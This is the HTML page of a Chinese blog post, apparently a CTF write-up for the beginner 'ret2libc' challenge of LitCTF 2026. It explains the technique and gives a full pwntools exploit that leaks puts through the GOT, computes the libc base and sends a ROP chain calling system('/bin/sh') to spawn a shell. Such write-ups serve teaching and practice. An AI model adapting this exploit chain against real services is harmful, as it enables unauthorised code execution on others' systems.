
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8" />
    <title>Hello(*^▽^*)</title>
    <meta name="author" content="0xt5" />
    <meta name="description" content="一个基于 Hexo 和 GitHub Pages 的个人博客" />
    <meta name="keywords" content="Hexo,GitHub Pages,Blog" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/custom-particlex-avatar.png" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>



<script src="/js/lib/preview.js"></script>





<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 8.1.2"></head>
<body>
    <div
        id="tab-title-config"
        data-enable="1"
        data-active-title="Hello(*^▽^*)"
        data-active-delay="2600"
        data-default-title="LitCTF 2026 - ret2libc | 0xt5 Blog"
        data-inactive-title="∑(っ°Д°;)っ诶卧槽，不见了"
        data-inactive-scroll-speed="180"
        hidden
    ></div>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>如果加载较慢，请稍后刷新页面。</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>0XT5 BLOG</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;首页</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;碎碎念</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;归档</span>
        </a>
        
        <a href="/comment">
            <i class="fa-solid fa-comment fa-fw"></i>
            <span>&ensp;留言板</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;标签</span>
        </a>
        
        <a href="/links">
            <i class="fa-solid fa-link fa-fw"></i>
            <span>&ensp;友情链接</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;0XT5 BLOG</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">首页</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">碎碎念</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">归档</div>
                    </div>
                </a>
                
                <a href="/comment">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-comment fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">留言板</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">标签</div>
                    </div>
                </a>
                
                <a href="/links">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-link fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">友情链接</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>LitCTF 2026 - ret2libc</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2026/5/23
        </span>
        
        <span class="category">
            <a href="/categories/CTF/">
                <span class="icon">
                    <i class="fa-solid fa-bookmark fa-fw"></i>
                </span>
                CTF
            </a>
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            <span class="tag">
                <a href="/tags/%E5%9F%BA%E7%A1%80%E9%A2%98/" data-tag-name="基础题" data-tag-color-role="text">
                    基础题
                </a>
            </span>
            
            <span class="tag">
                <a href="/tags/ret2libc/" data-tag-name="ret2libc" data-tag-color-role="text">
                    ret2libc
                </a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <h1 id="LitCTF-2026-ret2libc"><a href="#LitCTF-2026-ret2libc" class="headerlink" title="LitCTF 2026 - ret2libc"></a>LitCTF 2026 - ret2libc</h1><p><a target="_blank" rel="noopener" href="https://platform.cyclens.tech/api/upload/55d197e2-f1dd-47be-8439-6086bd58868d">题目地址</a></p>
<p>这道题还是挺简单的挺适合初学者做的</p>
<p>前置知识补充：ret2libc攻击的核心思想是利用程序中的栈溢出漏洞，覆盖函数的返回地址，使其指向libc库中的system函数，并传递”&#x2F;bin&#x2F;sh”字符串作为参数，从而获得一个shell。</p>
<p>想要进阶的理解的话可以看这个<a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/14087">深入理解 ret2libc 技术-先知社区</a></p>
<p>最基础的ret2libc 甚至还给了pop_rdi leak_value</p>
<p>checksec一下</p>
<p><img src="/images/litctf-ret2libc/image-20260523173601041.png" alt="checksec"></p>
<p>ida一下</p>
<p><img src="/images/litctf-ret2libc/image-20260523175847781.png" alt="ida"></p>
<p>发现这里有现成的可以利用的rdi ret</p>
<p><img src="/images/litctf-ret2libc/image-20260523175911228.png" alt="pop-rdi"></p>
<p>还有泄露地址的地方</p>
<p><img src="/images/litctf-ret2libc/image-20260523180028904.png" alt="leak"></p>
<p>然后第一部分溢出之后然后泄露地址</p>
<p>然后返回main函数，接受地址之后</p>
<p>计算libc基址，然后溢出之后再binsh</p>
<pre><code class="language-python">from pwn import *

context(os=&quot;linux&quot;, arch=&quot;amd64&quot;)

elf = ELF(&quot;./ret2libc&quot;)
libc = ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;)

io = process(&quot;./ret2libc&quot;)
#io = remote(&quot;challenge.cyclens.tech&quot;, 30528)

pop_rdi = 0x4011b7
ret = 0x4011b8
leak_value = 0x4011c3
main_addr = 0x401234

offset = 72

payload = b&quot;a&quot; * offset
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(elf.got[&quot;puts&quot;])
payload += p64(leak_value)
payload += p64(ret)
payload += p64(main_addr)

io.recvuntil(b&quot;Tell me your name: &quot;)
io.send(payload)

io.recvuntil(b&quot;Leak: &quot;)
puts_addr = int(io.recvline().strip(), 16)
print(&quot;puts_addr =&quot;, hex(puts_addr))

libc_base = puts_addr - libc.sym[&quot;puts&quot;]
system_addr = libc_base + libc.sym[&quot;system&quot;]
binsh_addr = libc_base + next(libc.search(b&quot;/bin/sh\x00&quot;))

print(&quot;libc_base =&quot;, hex(libc_base))
print(&quot;system_addr =&quot;, hex(system_addr))
print(&quot;binsh_addr =&quot;, hex(binsh_addr))

payload = b&quot;a&quot; * offset
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(system_addr)

io.recvuntil(b&quot;Tell me your name: &quot;)
io.send(payload)

io.interactive()
</code></pre>
<p><img src="/images/litctf-ret2libc/image-20260523181855765.png" alt="getshell"></p>

    </div>
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2026 - 2026 0xt5 Blog
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;0xt5
        </div>
        <div>
            基于 <a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a> 驱动，使用
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX</a> 主题
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/particlex-main.js"></script>
    
</body>
</html>
